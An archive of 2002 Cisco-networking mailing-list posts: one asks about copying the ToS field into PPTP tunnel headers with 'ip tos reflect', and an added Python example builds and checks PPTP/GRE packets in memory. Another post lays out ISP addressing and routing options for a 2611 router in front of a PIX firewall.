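Run as a script it prints the resolutions. The two things worth taking away: the ISP needs /32 statics (or a separate aligned block plus a /30 on the radio link) before .172-.174 can reach the 2611, and under A.1 the 2611 itself resolves 80.80.80.129 toward the PIX because the whole /26 is connected on e0/1.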






Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57193&t=57193



copying TOS in VPDN PPTP [7:57194]

2002-11-10 Thread Stephane Litkowski
Hi all,

I'm trying to do some QoS features on PPTP tunnels, so I want the TOS field
from original IP header to be copied to the tunnel IP header. I tried the
command "ip tos reflect" but it doesn't work. IOS version is 12.2(11)T IP
PLUS. Did anybody already try it?
Here is my config:

vpdn-group 3
! Default PPTP VPDN group
 accept-dialin
  protocol pptp
  virtual-template 2
 ip tos reflect
(...)
!
!
interface Loopback0
 description VPN Endpoint
 ip address 192.168.255.254 255.255.255.255
!
interface Ethernet0
 description Private LAN interface
 ip address 172.16.4.254 255.255.0.0
 no ip proxy-arp
 ip nat inside
 no ip mroute-cache
!
interface Ethernet1
 description Public LAN interface
 bandwidth 128
 ip address dhcp
 ip helper-address 172.16.4.15
 no ip proxy-arp
 ip nat outside
 no ip mroute-cache
 service-policy output 3CB-Internet-128k
!
interface Virtual-Template2
 bandwidth 64
 ip unnumbered Loopback0
 peer default ip address pool LOCAL
 ppp authentication chap ms-chap callin
!
(...)
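Added example, my own and not Stephane's config or Cisco's implementation, of what "ip tos reflect" is supposed to produce at the packet level, so there is something concrete to compare a capture of the GRE traffic against. It builds the PPTP data-channel encapsulation (PPP in enhanced GRE in IPv4, RFC 2637) by hand; 192.168.255.254 is Loopback0 from the post, while the peer address, inner hosts, call ID and sequence numbers are assumptions.

```python
import socket
import struct

IPPROTO_GRE = 47           # PPTP data channel is GRE (RFC 2637 "enhanced GRE")
GRE_PROTO_PPP = 0x880B     # protocol type carried in the GRE header for PPP
GRE_FLAGS_K_S_V1 = 0x3001  # K (key present) + S (sequence present), version 1

# Constructed sample: 192.168.255.254 is Loopback0 from the post; the peer
# address is an assumption (documentation range).
TUNNEL_SRC = "192.168.255.254"
TUNNEL_DST = "203.0.113.10"


def ipv4_checksum(hdr):
    """RFC 1071 one's-complement sum over the header; yields 0 when run over a
    header whose checksum field is already filled in (the verification case)."""
    if len(hdr) % 2:
        hdr += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src, dst, proto, payload, tos=0, ttl=64, ident=0):
    """Minimal IPv4 header (no options), DF set, checksum filled, plus payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 20 + len(payload), ident,
                      0x4000, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
    return hdr + payload


def parse_ipv4(pkt):
    """Header fields, with the ToS byte split into DSCP (top 6 bits) and ECN."""
    (ver_ihl, tos, total, _ident, _ff, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {"tos": tos, "dscp": tos >> 2, "ecn": tos & 0x3, "ttl": ttl,
            "proto": proto, "src": socket.inet_ntoa(src),
            "dst": socket.inet_ntoa(dst), "payload": pkt[ihl:total]}


# Inner packet (constructed): a UDP datagram marked DSCP 46 / EF (ToS 0xB8),
# the way a voice flow would be marked; hosts are assumptions.
INNER = build_ipv4("172.16.4.10", "10.0.0.20", 17, b"voice", tos=0xB8)


def encapsulate_pptp(inner_ip, call_id, seq, reflect_tos,
                     src=TUNNEL_SRC, dst=TUNNEL_DST):
    """inner IP -> PPP (address/control 0xFF03 kept, protocol 0x0021 = IP)
    -> enhanced GRE (key = payload length + call ID, sequence) -> outer IPv4.
    With reflect_tos the inner ToS byte is copied into the outer header, which
    is what 'ip tos reflect' is for; otherwise the outer ToS is 0 and a
    DSCP-based policy on the physical interface sees plain best-effort GRE."""
    ppp = b"\xff\x03\x00\x21" + inner_ip
    gre = struct.pack("!HHHHI", GRE_FLAGS_K_S_V1, GRE_PROTO_PPP,
                      len(ppp), call_id, seq) + ppp
    tos = parse_ipv4(inner_ip)["tos"] if reflect_tos else 0
    return build_ipv4(src, dst, IPPROTO_GRE, gre, tos=tos)


def decapsulate_pptp(outer):
    """Reverse of encapsulate_pptp: (outer fields, call_id, seq, inner fields)."""
    o = parse_ipv4(outer)
    if o["proto"] != IPPROTO_GRE:
        raise ValueError("not GRE")
    flags, ptype, plen, call_id, seq = struct.unpack("!HHHHI", o["payload"][:12])
    if flags != GRE_FLAGS_K_S_V1 or ptype != GRE_PROTO_PPP:
        raise ValueError("not a PPTP data packet")
    ppp = o["payload"][12:12 + plen]
    return o, call_id, seq, parse_ipv4(ppp[4:])


def tos_is_reflected(outer):
    """The check to run on a tunnel packet: does outer ToS equal inner ToS?"""
    o, _, _, inner = decapsulate_pptp(outer)
    return o["tos"] == inner["tos"]


if __name__ == "__main__":
    for reflect in (True, False):
        pkt = encapsulate_pptp(INNER, call_id=7, seq=1, reflect_tos=reflect)
        o = parse_ipv4(pkt)
        print("reflect=%-5s outer tos=0x%02x dscp=%d reflected=%s"
              % (reflect, o["tos"], o["dscp"], tos_is_reflected(pkt)))
```

Capture GRE (IP protocol 47) on the public interface and compare the outer ToS byte with the one inside the PPP payload: an outer ToS of 0 next to an EF-marked inner packet means the reflection is not happening, and the output service-policy on Ethernet1 will treat every tunnel packet as best effort unless it classifies on something other than DSCP.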




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57194&t=57194



Re: Routing and Design Problem [7:57193]

2002-11-10 Thread Peter van Oene
Sounds like you might want to hire a consultant.

On Sun, 2002-11-10 at 12:23, Tunji Suleiman wrote:
> Hi Group,
> 
> I have a routing problem. I am certain my present config is alright and just
> need a routing entry from the ISP for things to work. But the ISP is not 
> cooperating, insisting the problem is with my config. So I want to make sure
> I've not explored all options before reverting to them.
> 
> Here's the scenario:
> 
> The ISP created a global /26 subnet, say 80.80.80.128 255.255.255.192 and 
> assign addresses from it to all their wireless clients through a multipoint 
> radio base-station. They assigned 80.80.80.171, .172, .173 and .174 to my 
> client. My target is a VPN solution between an Exchange server behind the 
> PIX to a larger network on the Internet with rfc1918 address 10.240.0.0. 
> Presently all ISP clients use ISP's internet uplink with address 
> 80.80.80.129 as default gateway. This works for any client with dual-homed 
> proxy with global address on ext link to  ISP and int interface to LAN with
> rfc1918 addresses.
> 
> My situation, however has a 2611 router with 2 eth interfaces one to the ISP
> radio and the other to PIX firewall. So I thought up a few options.
> 
> Option A: My preferred option and present config
> 
> Use ISP-assigned global addresses on router internal link to PIX, PIX 
> outside link to router, PAT address on PIX, reserve a global address for 
> future use and rfc1918 addresses on the inside of PIX for translation by 
> PAT.
> 
> For ext radio link between router & ISP, do one of:
> 1. use ip unnumbered on link to isp with config similar to:
> 
> int e0/0
> description link-2-isp
> ip unnumbered e0/1
> !
> int e0/1
> description link-2-pix
> ip address 80.80.80.171 255.255.255.192
> !
> ip default-gateway 80.80.80.129
> 
> 2. get isp to create and assign global or rfc1918 /30 subnet for the 
> wireless link to my client, so i have a config similar to:
> 
> int e0/0
> description link-2-isp
> ip address 192.168.0.2 255.255.255.252
> !
> int e0/1
> description link-2-pix
> ip address 80.80.80.171 255.255.255.192
> !
> ip route 0.0.0.0 0.0.0.0 e0/0 or 192.168.0.1
> 
> 3. get ISP to create a /29 subnet eg 80.80.80.182 255.255.255.248 and route
> it to my client with a route entry like:
> 
> 4. get ISP to create VLANs and corresponding routing entries to my client or
> other similar clients.
> 
> It seemed to me either way, for packets to find their way back to me from the
> ISP and the Internet, the ISP has to create routing entries similar to:
> 
> ip route 80.80.80.171 255.255.255.192 isp's-connected-interface
> ip route 80.80.80.172 255.255.255.192 80.80.80.171
> ip route 80.80.80.173 255.255.255.192 80.80.80.171
> ip route 80.80.80.174 255.255.255.192 80.80.80.171 for 1 & 2 above
> 
> ip route 80.80.80.184 255.255.255.248 isp's-connected-interface for 3 & 4 
> above.
> 
> Option B:
> 
> 1. Assign 1 address from ISP-assigned global addresses, say 80.80.80.171 to
> router ext link to ISP, reserve for future use or waste remaining 3 since I
> can't reassign the addresses behind the router. Then maybe:
> 
> a. Assign a private say 192.168.x.0/24 to PIX inside interface and all 
> inside hosts including Exchange server. Assign 10.240.77.0/24 between PIX 
> outside interface and router inside interface.
> 
> b. use a combination of static and dynamic NAT on PIX for exchange and 
> internal hosts, specifically statically translating for Exchange and 
> dynamically for other hosts.
> 
> c. use PAT on router to translate for everything originating from PIX.
> 
> I have tried the IP unnumbered option on my router e0/0, but the router won't
> accept it, with error: point-to-point (non-multi-access) interfaces only.
> 
> Now, my questions are:
> 
> 1. If the ISP refuses to cooperate completely, what are the implications of
> Option B with the double translation on PIX and router?
> 2. If the ISP agrees to cooperate, which of the options in A above is the 
> best solution?
> 3. Related to 2 above, if ISP agrees to cooperate with the simplest 
> solution, which seem to me to be, just a routing entry, is it possible, and
> if so, how do I get to use IP unnumbered on an ethernet interface?
> 4. Is there any better option/solution which I have not envisaged?
> 
> I should be most grateful to anybody able to assist me on this problem. 
> Priscilla, Howard, Larry Letterman, Steve Rider ... etc etc. I will send my
> present configs on request.
> 
> TIA.
> 
> Tunji
> 




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57195&t=57193